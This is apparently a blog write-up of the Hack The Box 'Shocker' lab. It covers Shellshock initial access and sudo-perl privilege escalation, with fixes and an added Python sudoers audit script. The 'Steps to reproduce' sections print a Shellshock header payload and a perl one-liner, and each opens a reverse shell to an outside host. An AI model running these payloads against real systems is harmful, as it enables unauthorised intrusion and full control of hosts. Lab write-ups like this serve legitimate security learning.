Lonely Nova's Workshop

Report - HTB Shocker Report


Nova_ 2023. 4. 11. 12:50

1. port scan result

IP Address     Open Port
10.10.10.56    80

 

 

2. initial access - ShellShock

Vulnerability Explanation : A CGI script that uses the shell is subject to the ShellShock vulnerability. An attacker can use this vulnerability to cause arbitrary remote code execution and take complete control over the system.

Vulnerability Fix : Update to the latest bash shell and move the CGI directory (cgi-bin) to a place that users cannot access.

Severity : critical

Steps to reproduce the attack :

() { :;};echo; /bin/bash -i >& /dev/tcp/10.10.14.4/443 0>&1

screenshot:


post-exploitation : 

screenshot:

 

3. Privilege Escalation - sudo setting vulnerability

 

Vulnerability Explanation : After establishing a foothold on the target, I noticed there is a sudo setting vulnerability. This setting can be verified with the command below:

sudo -l

After entering this command, I noticed that I can use the perl program as administrator with no password. This vulnerability can cause privilege escalation. I can escalate privileges by using a reverse shell.


Vulnerability Fix : If possible, do not use this setting. Fix the /etc/sudoers file.
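
To support the fix above, here is an added example (not part of the original report) of an audit that reads sudoers content and flags passwordless rules for interpreters such as perl. The user names, binary paths, sample sudoers text and the RISKY list are assumptions made for the example; aliases and included files are not expanded.

```python
import re

# Programs that hand out a shell or run arbitrary code when started through sudo.
# Assumed starter list for this example; extend it for your environment.
RISKY = {"perl", "python", "python3", "ruby", "bash", "sh", "awk", "vim", "find"}
RULE = re.compile(r"^(?P<who>\S+)\s+(?P<host>[^=\s]+)\s*=\s*(?P<spec>.+)$")
TAG = re.compile(r"\s*([A-Z_]+):\s*")

def logical_lines(text):
    """Join backslash-continued lines, drop blanks and comments."""
    for line in re.sub(r"\\\n", " ", text).splitlines():
        line = line.strip()
        if line and not line.startswith("#"):  # included files are not followed
            yield line

def audit(text):
    """Return (user, command) pairs that run a risky program without a password."""
    findings = []
    for line in logical_lines(text):
        m = RULE.match(line)
        if not m or m["who"].startswith("Defaults") or m["who"].endswith("_Alias"):
            continue  # settings and alias definitions; aliases are not expanded
        nopasswd = False  # a tag carries over to later commands in the same rule
        spec = re.sub(r"\([^)]*\)", "", m["spec"])  # drop (runas) lists
        for cmd in spec.split(","):
            while (t := TAG.match(cmd)):
                if t[1] in ("NOPASSWD", "PASSWD"):
                    nopasswd = t[1] == "NOPASSWD"
                cmd = cmd[t.end():]
            parts = cmd.split()
            binary = parts[0] if parts else ""
            if nopasswd and (binary == "ALL" or binary.rsplit("/", 1)[-1] in RISKY):
                findings.append((m["who"], binary))
    return findings

# Constructed sudoers content (user names and paths are made up for the example).
SAMPLE = r"""
Defaults env_reset
Defaults secure_path="/usr/sbin:/usr/bin"
root    ALL=(ALL:ALL) ALL
webuser ALL=(root) NOPASSWD: /usr/bin/perl
deploy  ALL=(root) NOPASSWD: /usr/bin/systemctl restart nginx, \
        /usr/bin/python3
backup  ALL=(root) NOPASSWD: /usr/bin/rsync, PASSWD: /bin/bash
"""

if __name__ == "__main__":
    for user, binary in audit(SAMPLE):
        print(f"[!] {user}: passwordless sudo for {binary}")
```

Each finding is a rule to remove or to narrow to a fixed, non-interpreter command in /etc/sudoers (edited with visudo).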

 

Severity : critical

Steps to reproduce the attack : 

perl -e 'use Socket;$i="10.10.14.4";$p=446;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

screenshot:



post-exploitation : 

screenshot:
